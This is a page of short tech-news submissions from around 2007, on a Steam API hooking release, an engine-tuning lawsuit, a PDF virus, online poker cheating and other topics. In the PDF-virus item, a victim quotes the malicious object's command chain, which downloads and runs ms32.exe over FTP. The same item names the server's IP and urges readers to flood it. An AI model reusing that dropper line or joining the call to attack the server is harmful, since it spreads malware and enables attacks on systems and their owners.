Programming

Submission + - Valve's Steam API uncovered (myg0t.com)

Anonymous User writes: "Programmers from the internet harassment group known as "myg0t" have recently released a source code to the public exposing some sensitive "hidden material" in the Steam.exe and steam_api.dll, this hidden content includes Steam's billing interface, utility interface, client interface, user interface and many login exports from steam.

In the news post it states:
"This is a 100% complete Steam API hooking base written by [myg0t]s0beit. It will allow you access to several well hidden interfaces inside the Steam application and some games as well. Here is a short run-down of the basic interfaces it will allow you to completely hook:

ISteamFriends — the steam friends and community class
ISteamUser — user information on the steam client
ISteamClient — client information
ISteamBilling — steam billing information
ISteamUtils — misc steam utilities

It's important to mention that while this is 100% fully functioning, it is outdated as of the release of TF2; they use several new interfaces inside the game and have moved other interfaces into the Steam application itself or vice-versa. That said, the current updated base will not be released anytime soon if ever, if you can understand this release well enough then this should be a non-issue for you.

We must insist that you use this proof of concept code only for non-harmful, peaceful, education purposes only and that it not be discussed anywhere outside of our news forum. myg0t does not and has never condoned illegal activity of any kind or activities with otherwise malicious intent. This is a learning tool so please use it responsibly, as we have for the last year."

No doubt this is something Valve must take seriously, hopefully they will fix this soon."

The Internet

Submission + - Lawsuit in open-source tuning land (pgmfi.org) 1

David Blundell writes: "I owned and operated the largest online site dedicated to tuning and open-source solutions for engine management — chipping and tuning engine computers, basically. From May 2002 till the beginning of this year. Last year, I received a Cease and Desist notice (which was forwarded to the EFF, who were very helpful) for a matter involving a posting on the forum that was removed within 48 hours of telephonic notification. The company involved was pursuing the matter rather aggressively initially, but I thought the matter had been dropped earlier this year after I sold the site until I was surprised by a lawsuit last week.

If anyone is curious about the details of this mess and how it has been handled up to this point, go check out http://forum.pgmfi.org/viewtopic.php?p=95637 (don't worry — no registration required) — it's probably an hour read, but there is a timeline of events and all legal correspondence exchanged over this mess is available for your viewing pleasure.

I'm trying to spread awareness of this matter because I think it is important for forum operators everywhere to understand the risks involved with companies willing to aggressively protect their IP. Also, I think there are some rather novel (well, at least interesting?) issues here:

-The "software" in question here was a backdoor. An existing product's protocols were used in a manner that the original authors had not intended. A software license agreement forbidding reverse engineering may have been violated in the course of creating the "software." Who should be the target? Hosting provider or author? Limitations? At what point does a product that makes use of reverse-engineered protocols (something like Samba, for instance) become a violation of intellectual property?

-The company suing me presumably are laying claim to the code that the downloader can access as their intellectual property. This code was originally written by Honda, reverse engineered and presumably modified by Hondata, who are suing me. Honda could care less about the matter. Without any patents or copyrights, do Hondata have an intellectual property claim to code that they didn't exclusively write (merely modified) running on hardware they did not design, build or sell?

-What are the limits on the duty of care of a forum hosting provider? Moderator? Mere domain owner?

-Is this a case of a large, established commercial provider using strong-armed legal tactics to manipulate and push around an open-source project (and/or take over it, see demands in link), or were there more legitimate claims?

I'm hoping to receive some answers to these questions from an IP attorney, and I'll be sure to share as things progress.

Thanks for listening."

Patents

Submission + - MPEG LA: "Vizio HDTV success from patent viola

schwit1 writes: A recent article in the Wash Post talked about Vizio's fast rise to the top of HDTV sales. Larry Horn, CEO of MPEG LA claims "that unlike other manufacturers mentioned (Samsung, Philips, Sony and Sharp), Vizio reduces costs in part by failing to pay for a license under patents enabling the core digital compression technology used in all high-definition televisions, including its own.

What's more, it encouraged the unauthorized use of intellectual property, which in this case is readily available to all high-definition television suppliers, including Vizio, on fair, reasonable nondiscriminatory terms."

Is MPEG LA a patent troll? Is Larry upset because Vizio is using someone else's HD technology? If a violation is occurring where's the lawsuit?
Security

Submission + - Device to audit and replay RDP, SSH, and Telnet tr (balabit.com)

eldar40k writes: "I have visited the Systems exhibition this week (Munich, Germany), and came across a device that can transparently control and audit RDP and SSH traffic, store and search the results, and even replay the sessions like a movie. You can even search in the texts displayed by the server or typed by the client, for both RDP and SSH. Trial VMWare version is provided upon request at sales@balabit.com."
United States

Submission + - Bill to Restore Checks on Federal Government (jbs.org)

Anonymous writes: "American Freedom Agenda Act of 2007 (H.R. 3835) Introduced
Congressman Ron Paul introduced The American Freedom Agenda Act which would allow Guantanamo detainees to petition for a writ of habeas corpus under section 2241 of title 28, United States Code, it would bar presidential signing statements, bar evidence obtained from torture be used as evidence, protect journalists critical of the federal government, and restore checks and balances to the government."

Worms

Submission + - PDF virus targets Acrobat READER 1

hoggoth writes: The recent outbreak of the 'Peachy' virus showed that PDFs can carry dangerous content. All of the news outlets are repeating Adobe's statement that only the full Acrobat suite can activate the virus, that the free Acrobat Reader is immune. However as a victim of a PDF carried virus I can tell you it's not true.

This morning I got an email from a financial services firm I have an account with to an email address I set up just for that financial services firm. This led me to stupidly trust the email that contained a PDF attachment. When I clicked on it a window popped up and went away; very suspicious behavior. So I looked closer at the PDF file and found that it contained a mailto: that put some DOS commandline instructions in a file and executed them, which contacted a server, downloaded an executable, and ran it. The meat of the offending part is this:

14 0 obj7&@echo binary>>7&@echo get /ms32.exe>>7&@echo quit>>7&@ftp -s:7 -v -A>nul&@del /q 7&@start ms32.exe&\" \"&\" "con.cmd)/S/URI>>

This calls cmd.exe with a long command that turns off your firewall, FTP's into the offending site, downloads a rogue version of ms32.exe, and runs it. The virus installed a number of files to my computer and modified the startup to run them. I *think* I got rid of it all, although one can never be sure today with rootkits and all. I googled all over, and I think this is 'breaking news'. Every outlet is still saying Acrobat Reader is safe.

Entities to Hate:

The virus server at 203.121.69.116
Financial services institutions that sell your private email address to marketers.
Adobe for allowing PDFs to execute cmd.com.
Adobe for lying about Acrobat Reader being safe.
Microsoft for their entire insecure operating system. Come on, outside data is allowed to run and TURN OFF THE FIREWALL?!

Please feel free to pound that FTP server's IP address with all the hate you can muster.
Networking

Submission + - ARRL VS FCC over BPL! (arrl.org)

Brew Bird writes: "From the 'Power Lines are not for Data' department —
This has been going on for years, but it's finally made it to the courts! The ARRL (Ham radio guys for the unknowing) has managed to drag the FCC into court over their 'waiver' that allows noisy BPL operators to pollute the radio spectrum with impunity. Some Broad Band Power Line systems create annoying radio frequency noise that interferes with existing radio gear. The FCC is SUPPOSED to have these systems shut down until they can be repaired, but has been loath to do so. So, after all the proper 'legal' avenues have been exhausted, the FCC has been hauled in front of a judge to explain just why it's 'ok' for the power company to jam radio systems, but no one else can."

Television

Submission + - Why Can't I buy a cablecard ready set top box? (arstechnica.com) 1

Al E Usse writes: "Ars Technica does a write up of the problems that haven't been solved by the July 1, 2007 integration ban on integrated security in your cable box. Three months after the ban went into effect, digging up a third-party, CableCARD-ready set-top box can be an exercise in hair-pulling frustration. The companies who make the boxes don't seem interested in selling to consumers, cable companies still push their own branded devices, and Best Buy employees... well, the less said the better. We've heard the pain of our readers on this issue. One of them described his own epic (and fruitless) quest to secure such a device. His conclusion? "Although I should be able to buy a set-top box of my own, nobody will sell me one. I am standing on the doorstep, wad of cash in hand, yelling, 'Please take my money! I want to buy!' but am turned away."
The Internet

Submission + - Online Poker Room Caught Cheating -Absolute Poker (nytimes.com) 1

gus spangles writes: Absolute Poker, one of the major online poker rooms, has been caught cheating, allowing some players the ability to see other people's cards. Absolute had issued a public statement denying the claims after an internal investigation but then provided self-incriminating evidence to an outside researcher that implicated them beyond any doubts.
Even more shocking is that all early information points to it being an internal job headed possibly by former (current?) owners of the site. Credit to crazymarco, wacokid, n82, snagglepuss, adanthar, and others who have helped in this investigation.
Steven Levitt's nytimes blog writeup of the situation
solid summary of how some of the information was obtained on n82's blog
youtube video of a recreation from the hand history files of one of the instances of cheating in a $1,000 entry online poker tourney on absolute
latest discussion thread on 2+2 where the story was uncovered

Security

Submission + - Student Who Uncovers Breach Escapes Expulsion (pcworld.com)

mikesd81 writes: "PC World reports that a student at Western Oregon University who accidentally discovered a file containing personal data on a publicly accessible university server and then handed that data over to the student newspaper has narrowly escaped being expelled for his actions.

Brian Loving stumbled upon a file containing the names, Social Security numbers and grade point averages of between 50 to 100 students on a publicly accessible university server in June. Loving downloaded a copy of what he discovered and handed it over to the Western Oregon Journal, the campus newspaper. Though the paper's final publication date for the academic year had already passed, it decided to publish a four-page special report with an article describing Loving's discovery. No names of any of the students were published in the article.

Two months into the investigation, Loving — who is now a staffer with the newspaper — was found to have broken a university computer use policy that prohibits unauthorized people from accessing confidential files that may have been inadvertently placed in a publicly accessible location."

Space

Submission + - ISS Expedition 15 Crew Snap Dramatic Cloud Photos

An anonymous reader writes: From their silent orbit high above planet Earth (via), International Space Station (ISS) astronauts have a unique view and perspective of events on Earth. On 20 August 2007 the Expedition 15 crew aboard ISS witnessed stunning and huge clouds formed over Earth. Five pictures were taken, listed here in time order, giving us the opportunity to share in the spectacular scene: #1, #2, #3, #4, #5, and the via which includes links to larger photos, and links to the original NASA images. And finally, look at this beautiful and interesting cloud pattern over Earth, photographed on 11 August 2007 during Space Shuttle Endeavour's STS-118 mission: #6 (via), #7 (via).
Google

Submission + - Google revoking DRM permissions on bought videos! 1

DoofusOfDeath writes: A few months ago I purchased a great Discovery Channel video from Google's downloadable video service. Sure I can't media-shift it, but I was willing to trade away some fair-use rights so my kids could see the video. I paid cash, they give me the video. End of story, right?

Wrong. Today I got this email (see below). It just goes to show that with DRM, there's little limit to the evil that can be done to you:

Hello,

As a valued Google user, we're contacting you with some important information about the videos you've purchased or rented from Google Video. In an effort to improve all Google services, we will no longer offer the ability to buy or rent videos for download from Google Video, ending the DTO/DTR (download-to-own/rent) program. This change will be effective August 15, 2007.

To fully account for the video purchases you made before July 18, 2007, we are providing you with a Google Checkout bonus for $20. Your bonus expires in 60 days, and you can use it at the stores listed here: http://www.google.com/checkout/signupwelcome.html. The minimum purchase amount must be equal to or greater than your bonus amount, before shipping and tax.

After August 15, 2007, you will no longer be able to view your purchased or rented videos.

If you have further questions or requests, please do not hesitate to contact us. Thank you for your continued support.

Sincerely,

The Google Video Team

Google Inc.
1600 Amphitheatre Parkway
Mountain View, CA 94043
Oracle

Submission + - Oracle contributes Linux code, expands hardware su

Jaden writes: Oracle expanded the list of hardware compatible with its Linux distribution and added support for Novell's YAST administration tool. The certified six hardware configurations to run Oracle Enterprise Linux. Certified products include those made by Compellent Technologies, Dell, Egenera, EMC, Hewlett-Packard, Pillar Data Systems and Unisys. The company also said it is making a file system tuned for large storage configurations available under an open-source license. Called the Btrfs file system, Oracle made an alpha release available. Oracle also said it is releasing an open-source version of the YAST Linux installation and configuration tool for Oracle Enterprise Linux and Red Hat Enterprise Linux under the General Public License.
